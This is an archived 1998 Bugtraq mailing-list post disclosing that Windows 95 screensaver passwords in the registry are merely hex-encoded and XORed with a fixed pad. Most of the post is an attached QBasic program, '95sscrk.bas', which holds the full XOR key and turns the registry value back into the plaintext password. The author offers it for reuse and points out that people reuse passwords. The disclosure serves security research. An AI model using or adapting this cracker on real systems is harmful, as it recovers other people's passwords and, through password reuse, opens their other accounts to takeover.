[6841] in bugtraq
Windows95/98(?) Screensavers
daemon@ATHENA.MIT.EDU (CrazyLinux)
Thu May 28 13:30:44 1998
Date: Tue, 26 May 1998 23:31:47 +0200
Reply-To: CrazyLinux <kmspill_km@INAME.COM>
From: CrazyLinux <kmspill_km@INAME.COM>
To: BUGTRAQ@NETSPACE.ORG
This is a multi-part message in MIME format.
--------------D64CF242C878C90431979B38
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
I got the idea to explore a bit on the w95ss password in the registry
after seeing the bruteforce cracker (using tables of bytes).
(why this is important to bugtraq? loads of people use 1 password for
everything)
It's kinda simple. First hex-decode the bytes (like in WSFTP) then XOR
them with a pad. A basic prog follows (I was too lazy to get C off the
CD).
-cp
Feel free to recode it in C and post to the list.
--------------D64CF242C878C90431979B38
Content-Type: text/plain; charset=us-ascii; name="95sscrk.bas"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline; filename="95sscrk.bas"
DECLARE FUNCTION DecryptByte! (bytes!, ya!)
DECLARE FUNCTION HexVal! (coder$)
DIM SHARED byte(16) AS INTEGER
CLS
PRINT "Crazydog's w95 screensaver cracker, basic version"
INPUT "Input char part of ScreenSave_Data(from registry):", code$
z = LEN(code$): IF z MOD 2 <> 0 THEN PRINT "Must be even # of chars!": END
ON ERROR GOTO 40
FOR y = 1 TO z STEP 2
balon = balon + 1
nibbleone$ = MID$(code$, y, 1): nibbletwo$ = MID$(code$, y + 1, 1)
mega = (HexVal(nibbleone$) * 16) + HexVal(nibbletwo$)
IF HexVal(nibbletwo$) < 0 THEN mega = -255 ' one if only.
IF mega < 0 THEN PRINT "That didn't make any sense.": END
byte(y) = DecryptByte(mega, balon):
wilma$ = wilma$ + CHR$(byte(y))
NEXT y
PRINT "The code is: "; wilma$; " (case insensitive)"
END
40 PRINT "[unknown]": END
FUNCTION DecryptByte (bytes, ya)
DIM xorpattern(31) AS INTEGER
xorpattern(1) = &H48: xorpattern(2) = &HEE: xorpattern(3) = &H76
xorpattern(4) = &H1D: xorpattern(5) = &H67: xorpattern(6) = &H69
xorpattern(7) = &HA1: xorpattern(8) = &H1B: xorpattern(9) = &H7A
xorpattern(10) = &H8C: xorpattern(11) = &H47: xorpattern(12) = &HF8
xorpattern(13) = &H54: xorpattern(14) = &H95: xorpattern(15) = &H97
xorpattern(16) = &H5F
DecryptByte = bytes XOR xorpattern(ya)
END FUNCTION
FUNCTION HexVal (coder$)
coder$ = UCASE$(coder$)
SELECT CASE coder$
CASE "0"
whee = 0
CASE "1"
whee = 1
CASE "2"
whee = 2
CASE "3"
whee = 3
CASE "4"
whee = 4
CASE "5"
whee = 5
CASE "6"
whee = 6
CASE "7"
whee = 7
CASE "8"
whee = 8
CASE "9"
whee = 9
CASE "A"
whee = 10
CASE "B"
whee = 11
CASE "C"
whee = 12
CASE "D"
whee = 13
CASE "E"
whee = 14
CASE "F"
whee = 15
CASE ELSE
whee = -21
END SELECT
HexVal = whee
END FUNCTION
--------------D64CF242C878C90431979B38--
